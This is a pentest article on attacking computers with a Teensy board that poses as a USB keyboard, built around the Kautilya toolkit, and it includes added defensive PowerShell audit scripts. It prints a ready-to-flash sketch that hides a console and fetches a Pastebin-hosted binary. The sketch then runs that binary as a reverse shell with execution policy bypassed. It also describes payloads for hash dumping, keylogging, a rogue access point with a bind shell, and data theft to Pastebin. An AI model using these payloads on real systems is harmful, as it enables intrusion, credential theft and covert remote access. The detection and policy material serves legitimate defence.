

Modern operating systems have an interesting property: they completely trust devices such as a keyboard or a mouse. So if you build a device that emulates the input you want and plug it into a computer, you can do practically anything on that computer.

WARNING: This information is provided for educational purposes only. Using it for improper purposes may be punishable by law. Neither the author nor the editors bear any responsibility in that case.

A small example

I'll start with a small demonstration. Imagine a security specialist conducting an internal pentest in a company who notices that one of the employees often leaves their workstation unlocked. The obvious move is to walk up and type some "evil" commands while nobody is looking. But there is a real risk of being caught: a stranger sitting at someone else's desk doing something odd in a black console window does not go unnoticed :). What if the researcher instead had a device that, once plugged in, types the pre-programmed commands by itself? Walking up and discreetly inserting such a device takes only a few seconds. Or take another example: an attacker who has no physical access to the computers at all. If the device is disguised as a mouse, a flash drive or a 3G modem, there is a good chance an employee will plug it in without any help from the attacker. There have been cases where such devices were simply mailed to a company as souvenirs. The share of users who, unaware of the trick, connect the device to a computer is quite high. And neither the system nor, say, the anti-virus notices anything: to them it is an ordinary keyboard. Why is that?


First you need to understand the concept of a Human Interface Device, or HID. Wikipedia defines a HID as a type of computer device that interacts directly with a person, most often taking input from the person and delivering output to them. The most common HID devices are the keyboard, the mouse and the joystick. From the point of view of a computer system, HID devices are fully trusted and are treated simply as the interface between the user and the machine. When you plug a new keyboard or mouse into a computer, nobody asks your permission to install it, and the drivers are usually installed automatically. Such boundless trust can backfire on the user, and information security specialists noticed this long ago. Back in 2010, at the DEFCON hacker conference, the well-known Irongeek and Dave ReL1K talked in detail about using HID devices for security testing. Since then, nothing has changed on the defensive side. And nothing stops anyone from building a device that performs programmed actions under the guise of a keyboard, which is what I found out in the course of my research.

Teensy board

As the basis for the USB device I chose the Teensy++ 2.0 board. It is a programmable microcontroller board that comes with a full USB port. The examples collected in large numbers on the official site include an LED T-shirt that displays different images with its diodes, a machine that draws a chosen picture with a marker on any flat surface, an RFID card reader, a motion detector and dozens of other uses. You have surely heard of the Arduino and its clones; Teensy is a very similar project. What matters for my task is that it is extremely easy to implement a HID device on a Teensy, one that the system will recognise as a keyboard or, say, a mouse. Since the board already has a USB port, I did not even have to pick up a soldering iron or do any hardware surgery. All that was needed was to write the right program. Note that the board comes in several versions; I chose the most expensive and best-equipped one, the Teensy++ 2.0. It can be ordered from the project's official site, pjrc.com, for only $24.

Restrictions in Teensy

There is one thing that complicates life with the Teensy. Because we are emulating a HID device, we can talk to the system but we cannot hear it. This is the main limitation when writing payloads for the Teensy, and it makes the payloads less sensitive to the state of the system. The payload developer has to anticipate every possible situation and the system's reaction in advance, because reading the system's response at run time is impossible. The only thing a Teensy acting as a keyboard can read back from the host is the state of the Caps Lock, Num Lock and Scroll Lock indicators. Another limitation is the small memory of the device, but that can be lived with, especially if you attach additional storage to the Teensy, such as an SD card.

Hello world

Like the Arduino boards, the Teensy uses an Atmel AVR processor, so you can use the same development environment, the Arduino Development Environment (arduino.cc), also called the ADE. It is freely available for all popular operating systems (Windows, Linux, Mac OS X) and, besides editing code, it lets you flash the program into the microcontroller. To use it fully with a Teensy you also need to install the Teensyduino add-on (pjrc.com/teensy/teensyduino.html). Among other things, the add-on lets you switch the Teensy to keyboard emulation straight away: in the ADE this is done through the menu «Tools -> Boards -> USB Keyboard». If you then plug the device into a computer, it is immediately recognised as a keyboard. Nothing will happen, though, as long as nothing has been programmed.


The Arduino Development Environment with the Teensyduino add-on installed for Teensy support

What does a program, or, in the local terminology, a sketch, look like for the Teensy? Development is done in a C-like syntax (the Arduino language is essentially C++). The programmer has variables, functions, conditional statements and pointers available, in short, everything needed for happiness. Every sketch must contain the functions setup() and loop(): the first is called once at startup, the second runs the code written inside it over and over. The functions may even be empty, but they must be present, otherwise compilation fails. Here is a simple example:

void setup() {}

void loop() {
  Keyboard.print("Hello World");   // type the text on the host as keystrokes
  delay(5000);                     // wait 5 seconds before typing it again
}
As you can see, I used the ready-made Keyboard.print() function for the emulation. The text will be typed repeatedly, because the call is made from loop(). The delay() call is there so that the repetitions don't come too fast. The documentation describes in detail the more complex cases of emulating a keyboard, a mouse and a joystick, so I will end the description of Teensy programming here. In the course of my research I have already written all the sketches a pentester might need and released them as a ready toolkit, Kautilya (code.google.com/p/kautilya), which is open source and available to everyone.

Kautilya toolkit

While giving talks on the Teensy I noticed that pentesters very often have no time to program the microcontroller for their needs. As a result, they simply drop the tool. I decided to simplify the task and wrote a Ruby script that asks for a few parameters and outputs a finished sketch that can be flashed to the Teensy. With it, the microcontroller can be loaded with a payload without any knowledge of how to write software for it.


The Kautilya toolkit is driven through a console menu

To understand better what is inside Kautilya, let us consider what a pentest of a Windows 7 machine using a HID device would look like if it had to be done from scratch. Most likely the steps would be:

  1. Identify the target operating system.
  2. Find out which commands are supported and learn to use them to perform the needed actions in the system with PowerShell and/or VBS scripts.
  3. Identify the built-in security mechanisms (such as UAC and the PowerShell script execution policy) that can get in the way of privileged commands, and find a way around them.
  4. Find out how long the OS takes to execute various commands.
  5. Record the commands and scripts on the Teensy board.
  6. Find out what pitfalls the command line presents when the Teensy sends commands (emulates keyboard input) on the victim's machine.
  7. Try to remain as inconspicuous as possible on the victim's computer.
  8. Test the payload and produce the final sketch.
  9. Compile the sketch and flash it to the Teensy.
  10. Connect the device to the victim's machine, or arrange for the victim to do it (for example, through social engineering).
  11. Get the result :).

The next few lines may look like self-promotion ;). Kautilya automates steps one through eight. In other words, using the toolkit, all the researcher has to do is:

  1. Choose a ready-made payload from the Kautilya console menu and specify its options; the result is a finished sketch (an *.ino or *.pde file).
  2. Flash the sketch to the Teensy board.
  3. Connect the device to the target machine.
  4. Enjoy the victory!

At the moment the toolkit contains payloads for Windows 7 and Linux (tested on Ubuntu 11.04). Not to be unfounded, I propose to look at some of them and see how they work when the victim's machine runs Windows 7.


Creating a sketch that dumps user password hashes

Is there a way to protect?

I see two basic ways to protect Windows systems against these attacks:

  1. Prevent the installation of removable devices. This can be done through group policy (gpedit.msc) for the local machine, and through domain policy for workstations in a domain. Under "Administrative Templates -> System -> Device Installation -> Device Installation Restrictions" you will find the various settings for restricting device installation. I would recommend enabling "Prevent installation of removable devices"; after that no newly connected removable device will be installed on the system. In addition, driver updates for already installed devices will be blocked. Only an administrator will be able to install a new device, and even then only after the option "Allow administrators to override Device Installation Restriction policies" is enabled. Keep in mind that in an organisation this will certainly turn into a nightmare for users, who lose the usual Plug'n'Play, and for admins, who will be tortured with requests to come and look at a computer. What to do?
  2. Act radically and prevent physical access to the USB ports. Unfortunately, most often this is not possible: in a big company there will always be a loophole. Some motherboard manufacturers claim that their security solutions are able to block such malicious devices (including ones built on a Teensy). I would strongly advise against trusting such claims: I tested one such protection, and it turned out to be little short of completely useless.
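The following script is an added example, not part of the article or of Kautilya. It audits the first defence above (the "Device Installation Restrictions" policy) and lists every keyboard-class device the system currently sees, so that a second "keyboard" hiding inside a mouse, flash drive or modem stands out. The registry key and the two value names it checks are the ones the group policy settings write to on Windows (assumed here; verify against the ADMX on your build); the Test-HidExposure function and its ExpectedVendorIds parameter are hypothetical names chosen for this example.

```powershell
# Added example (not from the article or Kautilya). Run in an elevated PowerShell.
# Assumption: the two policy settings named in the text land under this key as DWORD values.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions'

function Get-DeviceInstallPolicy {
    $result = @{
        DenyRemovableDevices = $false   # "Prevent installation of removable devices"
        AllowAdminInstall    = $false   # "Allow administrators to override Device Installation Restriction policies"
    }
    if (Test-Path $policyKey) {
        $props = Get-ItemProperty -Path $policyKey
        if ($props.DenyRemovableDevices -eq 1) { $result.DenyRemovableDevices = $true }
        if ($props.AllowAdminInstall    -eq 1) { $result.AllowAdminInstall    = $true }
    }
    New-Object -TypeName PSObject -Property $result
}

function Get-AttachedKeyboards {
    # Win32_Keyboard lists every keyboard *interface*, whatever the plastic around it looks like.
    # A Teensy enumerating as a keyboard shows up here exactly like a real one.
    foreach ($kb in (Get-WmiObject -Class Win32_Keyboard)) {
        $vid = $null; $prod = $null          # ($pid is a reserved automatic variable in PowerShell)
        if ($kb.PNPDeviceID -match 'VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})') {
            $vid = $Matches[1].ToUpper(); $prod = $Matches[2].ToUpper()
        }
        New-Object -TypeName PSObject -Property @{
            Description = $kb.Description
            PNPDeviceID = $kb.PNPDeviceID
            VendorId    = $vid
            ProductId   = $prod
            IsUsb       = ($kb.PNPDeviceID -like 'HID\VID_*' -or $kb.PNPDeviceID -like 'USB\VID_*')
        }
    }
}

function Test-HidExposure {
    # ExpectedVendorIds: hypothetical allow list of USB vendor IDs from your standard hardware build
    param([string[]]$ExpectedVendorIds = @())
    $policy    = Get-DeviceInstallPolicy
    $keyboards = @(Get-AttachedKeyboards)
    $findings  = @()
    if (-not $policy.DenyRemovableDevices) {
        $findings += 'Removable device installation is NOT blocked: a new HID device will be installed silently.'
    }
    if ($keyboards.Count -gt 1) {
        $findings += ('{0} keyboard interfaces present; one of them may be a "mouse" or "flash drive" that also reports a keyboard.' -f $keyboards.Count)
    }
    foreach ($k in $keyboards) {
        if ($k.VendorId -and $ExpectedVendorIds.Count -gt 0 -and ($ExpectedVendorIds -notcontains $k.VendorId)) {
            $findings += ('Keyboard "{0}" has vendor ID {1}, which is not in the expected list.' -f $k.Description, $k.VendorId)
        }
    }
    New-Object -TypeName PSObject -Property @{ Policy = $policy; Keyboards = $keyboards; Findings = $findings }
}

# usage: pass the vendor IDs of the keyboards your build actually ships with
$report = Test-HidExposure -ExpectedVendorIds @()
$report.Policy
$report.Keyboards | Format-Table Description, VendorId, ProductId, IsUsb -AutoSize
$report.Findings
```

Two caveats worth keeping in mind when reading the output. The policy only blocks the installation of new devices: anything that was installed before it took effect keeps working, and this check cannot tell you when a given keyboard first appeared (the setupapi log is the place for that). And a device that does not report itself as removable is not covered by "Prevent installation of removable devices" at all, which is one reason a strict allow-list policy (by device ID or setup class) is the stronger configuration under the same Group Policy node.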


Prohibiting the installation of external devices to prevent attacks via USB devices

Examples of use

Payload: download and run

As I said, the payload is chosen from the Kautilya console menu. One of the simplest payloads is Download and Execute, which downloads a file from the Internet and runs it on the target system. Of course, when creating the program for the microcontroller you have to specify where the file should be taken from. Interestingly, it is suggested that the binary be hosted on the Pastebin.com service, after first converting it to plain text; the special script exetotext.ps1 in the Kautilya/extras folder does that conversion. When executed on the victim's machine, the payload downloads the text file, converts it back into an executable and runs it in the background. That executable may be a Windows reverse Meterpreter (in essence, a reverse shell): if you connect a device with such a sketch to the test computer, the pentester will very soon get a Meterpreter session. The payload bypasses the PowerShell execution policy and does not display any windows on the target computer.

It is interesting to look at what Kautilya actually generates. Here is the script, with a few comments explaining the important points:

void run(char *SomeCommand);   // defined below; the prototype keeps the sketch valid outside the Arduino IDE

void setup() {
   delay(5000);
   // A 5-second delay is needed for Windows 7 to finish installing the "keyboard" and accept input

   run("cmd /T:01 /K \"@echo off && mode con: COLS=15 LINES=1 && title Installing Drivers\"");
   // Opens a very small console window (15 columns by 1 line) titled "Installing Drivers"

   delay(3000);

   Keyboard.println("echo $webclient = New-Object System.Net.WebClient > %temp%\\download.ps1");
   // Creates a WebClient object

   Keyboard.println("echo $url = \"http://pastebin.com/raw.php?i=NfiBdUp9\" >> %temp%\\download.ps1");
   // The raw-format Pastebin URL that was passed to Kautilya as an option

   Keyboard.println("echo [string] $hex = $webClient.DownloadString($url) >> %temp%\\download.ps1");
   // Downloads the text that encodes the executable

   Keyboard.println("echo [Byte[]] $temp = $hex -split ' ' >> %temp%\\download.ps1");
   // Splits the text on spaces and converts the tokens back into bytes

   Keyboard.println("echo [System.IO.File]::WriteAllBytes(\"%TEMP%\\payload.exe\", $temp) >> %temp%\\download.ps1");
   // Writes the resulting bytes to an exe file

   Keyboard.println("echo Start-Process -NoNewWindow \"%TEMP%\\payload.exe\" >> %temp%\\download.ps1");
   // Runs payload.exe in the background

   delay(2000);

   Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\download.vbs");

   Keyboard.println("echo oShell.Run(\"powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\\download.ps1\"), 0, true >> %temp%\\download.vbs");
   // Runs the PowerShell script from VBS, bypassing the execution policy and showing no window on the victim
   // (note: %temp% is not quoted inside the PowerShell command, so a profile path containing a space breaks it)

   delay(1000);

   Keyboard.println("wscript %temp%\\download.vbs");

   delay(3000);

   Keyboard.println("exit");
   // Closes the console window
}

void loop() {
   // loop() does nothing here, but the sketch must define it
}

void run(char *SomeCommand) {
   Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
   // Press the Windows key

   Keyboard.set_key1(KEY_R);
   // Press <R>

   Keyboard.send_now();
   // Send the <Windows>+<R> combination, which opens the "Run" dialog

   delay(1500);
   Keyboard.set_modifier(0);
   // Release the <Windows> key

   Keyboard.set_key1(0);
   // Release <R>

   Keyboard.send_now();
   // Report both keys released

   Keyboard.print(SomeCommand);
   // Type the command passed in SomeCommand into the "Run" dialog
   Keyboard.set_key1(KEY_ENTER);

   Keyboard.send_now();
   // Press <Enter>

   Keyboard.set_key1(0);

   Keyboard.send_now();
   // Release <Enter>
}

Once again: this generated sketch is ready to be flashed to the Teensy from the Arduino Development Environment exactly as it is.
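To make the Download and Execute payload concrete, here is an added example (my own, not Kautilya's exetotext.ps1) of the encoding that lets a binary travel as a plain-text paste, together with the exact decode the generated download.ps1 performs: split the text on spaces and cast the tokens to [Byte[]]. The token layout (one decimal number per byte, single spaces) is an assumption chosen because it is what the typed decode line accepts; the real exetotext.ps1 may lay the text out differently. The function names and the sample bytes are constructed for the example.

```powershell
# Added example, not part of the article or Kautilya.
function ConvertTo-ByteText {
    param([Parameter(Mandatory=$true)][byte[]]$Bytes)
    # one decimal number per byte, space separated: "77 90 144 ..."  (assumed layout)
    ($Bytes | ForEach-Object { $_.ToString() }) -join ' '
}

function ConvertFrom-ByteText {
    param([Parameter(Mandatory=$true)][string]$Text)
    # The same cast the Teensy types ([Byte[]] $temp = $hex -split ' '), made tolerant to runs of
    # whitespace. Any token outside 0..255, or a stray line break from the paste, makes the cast
    # throw: a payload that "does nothing" on the target is very often just a mangled paste.
    [byte[]]($Text.Trim() -split '\s+')
}

function Test-RoundTrip {
    param([Parameter(Mandatory=$true)][byte[]]$Original)
    $text    = ConvertTo-ByteText -Bytes $Original
    $decoded = ConvertFrom-ByteText -Text $text
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $h1  = [BitConverter]::ToString($sha.ComputeHash($Original))
    $h2  = [BitConverter]::ToString($sha.ComputeHash($decoded))
    New-Object -TypeName PSObject -Property @{
        BytesIn    = $Original.Length
        TextLength = $text.Length        # roughly 3-4x the binary size: a large text GET from a paste site
        BytesOut   = $decoded.Length
        Intact     = ($h1 -eq $h2)
    }
}

# constructed sample input: the first bytes of a PE header ("MZ" ...), not a real executable
$sample = [byte[]](0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF)
Test-RoundTrip -Original $sample

# For a real binary of your own (never a client's), the same two steps the payload relies on:
#   $bytes = [System.IO.File]::ReadAllBytes('C:\lab\test.exe')
#   $paste = ConvertTo-ByteText -Bytes $bytes                       # this text is what gets hosted
#   [System.IO.File]::WriteAllBytes("$env:TEMP\decoded.exe", (ConvertFrom-ByteText -Text $paste))
```

From the defender's side, the round trip explains the shape of the artefact: a workstation fetches a text document several times the size of a typical executable from a paste service, and seconds later wscript.exe spawns powershell.exe with -ExecutionPolicy Bypass running a script from %TEMP%, which in turn starts a freshly written payload.exe. That process chain and the dropped files are what proxy logs and process-creation auditing should be watched for.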

Payload: dump password hashes

Another payload can be used to dump password hashes from a Windows 7 machine. To use it, the researcher must first upload the powerdump Meterpreter script from Metasploit to Pastebin, from where it will later be downloaded to the victim. As is known, this script works only with SYSTEM privileges, which can be obtained by adding a task to the standard Task Scheduler. That good old trick, however, only works under an administrator account. To transfer the data, the sketch again uses the Pastebin service, but it does not expose the hashes to everyone: it publishes them as a private paste (not accessible to outsiders). For that you first need to register with the service and obtain a developer key (API developer key), which the sketch will use to publish the data. The Pastebin username, password and key, as well as the name of the scheduled task, are of course all requested by Kautilya when it creates the program for the Teensy. If you flash the resulting sketch and insert the device into the computer of a user who works as an administrator, the user's password hashes will very soon appear on Pastebin.com, and those can then be brute-forced.


Payload: keylogger

Among the payloads there is also a keylogger, a PowerShell script that saves the captured keystrokes to a private paste on Pastebin. Publication happens after a certain interval. The data, however, is in a format that is hard to read. To put it into an understandable form, use the script parsekeys.ps1 from the Kautilya/extras folder. For the script to work, all the data from Pastebin must be saved in a file named data.txt. When it finishes, it creates the file Logged_keys.txt, containing the keystrokes in readable form. Even such a simple keylogger is capable of capturing data entered into web forms and the text fields of applications.

Payload: creating fake web access point

This unusual payload uses the ordinary Windows 7 ability to create a hotspot: it brings up an access point on the target machine and starts a Meterpreter bind shell. So, if it succeeds, the pentester can connect to the newly created wireless network and reach the shell (this scenario only looks exotic; in practice it can be very effective). The shell runs in memory and is therefore hard to spot (thanks to Matt from exploit-monday.com for it). To create the program for the Teensy, the researcher must first generate a bind Meterpreter payload using the commands from the file extras\payloadgen.txt, and then copy the generated payload into the file src\rogue_ap.txt. When creating the program, Kautilya asks for the SSID of the access point, the key for connecting to the wireless network, and the port (for example, 4444) on which the connection will be accepted. If the payload succeeds and the wireless network comes up, connect to it, look at the connection settings and note the default gateway: that is the address of the target computer. The researcher can then connect to port 4444 using the msf listener and, bingo, get a Meterpreter session. You may wonder why the built-in Windows firewall does not block the connection. If you look at the source of the generated sketch, you will see that Kautilya adds your payload to the exception list of the standard Windows firewall.

Payload: the collection of information

The toolkit also includes a payload for gathering valuable information. In its standard form, using a special PowerShell script and the registry, it extracts the list of active users, the PowerShell environment, PuTTY trusted hosts, saved PuTTY sessions, the list of the machine's shared resources, environment variables, the list of installed applications, the domain name, the contents of the hosts file, the list of running services, the account policy, local users, local groups and WLAN information. The collected data, as usual, is stored on Pastebin as a private paste.
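The payloads described above (the SYSTEM scheduled task of the hash dump, the hosted network and firewall exception of the rogue access point, and the download.ps1 / download.vbs / payload.exe files dropped into %TEMP% by Download and Execute) all leave traces that a built-in Windows 7 toolset can find. The script below is an added example of such a sweep; it is my own, not part of the article or of Kautilya. It relies only on schtasks, netsh and the file system. The text parsing of the netsh output and the "suspicious" heuristics are assumptions I made for this example, and the function names are hypothetical.

```powershell
# Added example (not from the article or Kautilya). Run in an elevated PowerShell on the host being examined.

function Get-SuspiciousSystemTasks {
    # The hash-dump payload gets SYSTEM through a scheduled task. Microsoft's own tasks live under \Microsoft\,
    # so a non-Microsoft task running as SYSTEM deserves a look. (Assumed heuristic; a task hidden under
    # \Microsoft\ would slip through.)
    $rows = schtasks /query /v /fo csv | ConvertFrom-Csv
    $rows |
        Where-Object { $_.TaskName -ne 'TaskName' } |                      # schtasks repeats the header per folder
        Where-Object { $_.'Run As User' -match 'SYSTEM' -and $_.TaskName -notlike '\Microsoft\*' } |
        Select-Object TaskName, 'Run As User', 'Task To Run', Author
}

function Get-HostedNetworkState {
    # The rogue-AP payload uses the Windows 7 hosted network feature.
    $state = @{ Mode = $null; SSID = $null; Status = $null }
    foreach ($line in (netsh wlan show hostednetwork)) {
        if ($line -match '^\s*(Mode|SSID name|Status)\s*:\s*(.+?)\s*$') {
            $key = $Matches[1] -replace ' name', ''
            $state[$key] = $Matches[2]
        }
    }
    New-Object -TypeName PSObject -Property $state
}

function Get-InboundAllowRules {
    # Parses "netsh advfirewall firewall show rule ... verbose" into one object per rule.
    $rules = @(); $cur = $null
    foreach ($line in (netsh advfirewall firewall show rule name=all dir=in verbose)) {
        if ($line -match '^Rule Name:\s*(.*)$') {
            if ($cur) { $rules += New-Object -TypeName PSObject -Property $cur }
            $cur = @{ Name = $Matches[1].Trim() }
        } elseif ($cur -and $line -match '^([A-Za-z ]+):\s*(.*)$') {
            $cur[$Matches[1].Trim()] = $Matches[2].Trim()
        }
    }
    if ($cur) { $rules += New-Object -TypeName PSObject -Property $cur }
    $rules | Where-Object { $_.Action -eq 'Allow' -and $_.Enabled -eq 'Yes' }
}

function Find-PayloadArtifacts {
    $findings = @()
    foreach ($t in Get-SuspiciousSystemTasks) {
        $findings += ('Non-Microsoft task running as SYSTEM: {0} -> {1}' -f $t.TaskName, $t.'Task To Run')
    }
    $ap = Get-HostedNetworkState
    if ($ap.Status -eq 'Started') {
        $findings += ('Hosted network is up with SSID {0}' -f $ap.SSID)
    }
    foreach ($r in Get-InboundAllowRules) {
        # an allow rule for a program under a user profile, a Temp folder or powershell is the kind of
        # exception the rogue-AP payload adds (assumed heuristic)
        if ($r.Program -match '\\Users\\|\\Temp\\|powershell') {
            $findings += ('Inbound allow rule "{0}" for program {1} (local port {2})' -f $r.Name, $r.Program, $r.LocalPort)
        }
    }
    foreach ($f in @('download.ps1', 'download.vbs', 'payload.exe')) {   # names from the generated sketch above
        $p = Join-Path $env:TEMP $f
        if (Test-Path $p) { $findings += ('Dropped file present: {0}' -f $p) }
    }
    $findings
}

Find-PayloadArtifacts
```

Three limitations to keep in mind: the netsh and schtasks labels are localised, so the regular expressions above match English builds only; %TEMP% is the profile of the account running the script, so run it as the user who was logged on when the device was plugged in; and the scheduled task name is whatever the operator typed into Kautilya, which is why the check keys on the account rather than on a name.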

Life example

The question I am always asked: "Can all this be useful in a penetration test?" Yes. I would like to share the story of one pentest. I performed a penetration test for a major Indian financial services company. It was a "black box" test, that is, I was placed in the position of an attacker without access to anything. The company's servers accessible from the Internet were adequately protected, and there was no fault to be found in anything. It was unclear what to do. Then I went to their office and told the guards at the entrance that I had found several mice and flash drives that must have dropped out of some employee's bag. All the devices had been trojaned with a Teensy and contained various payloads. Half an hour later I got the first shell (most likely it was a computer in the guard room). By the end of the day I already had local administrator privileges on many computers; apparently the guards had handed the devices over to the IT department. Of the trojaned devices, 90% were connected to at least one system, and on 70% the payload placed inside them completed successfully. The client, who had poured a lot of money into security, was very surprised and impressed by this way of penetration. Now they have closed this hole. What do I mean by this? As long as operating systems and protective mechanisms trust HID devices, using them as an attack vector will not be a problem for intruders. Yet many security specialists still do not consider such attack methods serious. And wrongly so.